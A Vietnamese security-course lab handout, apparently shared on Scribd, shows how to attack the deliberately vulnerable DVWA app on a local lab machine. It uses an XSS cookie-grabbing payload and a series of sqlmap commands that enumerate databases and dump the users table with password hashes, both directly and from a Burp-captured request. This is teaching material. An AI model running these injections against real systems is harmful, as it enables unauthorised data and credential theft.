Scribd Logo
Upload

Welcome to Scribd!

  • Lab 11

    Uploaded by

    nam
    9 views9 pages

    Copyright

    © © All Rights Reserved

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    9 views9 pages

    Lab 11

    Uploaded by

    nam

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 9

    Lab 5

    Automate SQL Injection with SqlMap

    1. Giới thiệu
    SQLMAP là công cụ khai thác những lổ hỏng của cơ sở dữ liệu SQL. Công
    cụ này được xem là công cụ khai thác SQL tốt nhất hiện nay. Được giới bảo
    mật và giới hacker sử dụng thường xuyên. Với người dùng Kali thì
    SQLMAP đã được tích hợp sẵn vào hệ điều hành. Riêng Windows thì chúng
    ta phải cài đặt thêm python và SQLMAP để sử dụng.

    2. Các bước thực hiện


    - Bật xampp lên và trang máy kali vào 192.168.1.93/DVWA . Login vào
    với user: admin .Pass: password.
    - Sau đó chọn dvwa security > Chọn low và submit
    - Chọn SQL INJECTION
    - Gõ : 1 và submit

    - Note lại link


    - Tiếp theo ta tìm và note lại cookie:
    C1:Ta chọn XSS Reflected. Gõ mã:
    <script>alert(document.cookie)</script>
    Ta sẽ nhận được một thông báo có chứa đoạn cookie của page

    C2: Chuột phải chọn Inspect Element > Storage > Cookie >
    Note lại đoạn cookie.
    - Sau đó mở terminal và gõ câu lệnh :

    sqlmap –u “link” --cookie=“cookie” –b --current-db --current-user

    (Ở phần link và cookie ta copy lại 2 note mà ta tìm được ở phía trên lại)
    enter và sẽ được KQ là:
    Ta sẽ thấy được database và usser hiện tại.

    - Sau đó ta chạy lênh để xem các database:


    sqlmap –u “link” --cookie=“cookie” –dbs
    Ta có thể thấy hiện tại đang có 3 database

    - Tiếp theo ta thử vào xem database dvwa chứa những table nào:

    Sqlmap –u “link” --cookie=“cookie” –D dvwa --tables

    - Ta thấy có 2 tables.
    - Tieps theo ta có thể xem các columns có trong tables users:
    sqlmap –u “link” --cookie=“cookie” –D dvwa -T users –columns
    - Ta thấy các columns có trong table users.
    - Tiếp tục check thông tin các columns:
    sqlmap –u “link” --cookie=“cookie” –D dvwa –T users –dump
    Ta sẽ có được một table chứa 5 users và các thông tin của users đó và có cả
    password đã được mã hóa dạng md5.

    Medium.

    Ở phần này ta có thể sử dụng Burp Suite để làm

    - Cấu hình, kết nối dvwa với Burp Suit

    - Trong SQL Injection chọn 1 > Submit


    Copy pasta toàn bộ thông tin có được ra Notepad > Save lại. Cách này sẽ
    giúp ta đỡ phải tìm, search lại cookie và link nữa mà chỉ cần gọi thẳng đến
    Text mà ta vừa lưu
    Rồi sau đó vào Terminal và làm như bình thường giống như đã làm với
    Level Low phía trên

    sqlmap –r /home/kalilinux/Desktop/Hello.txt –D dvwa –T users –dump

    You might also like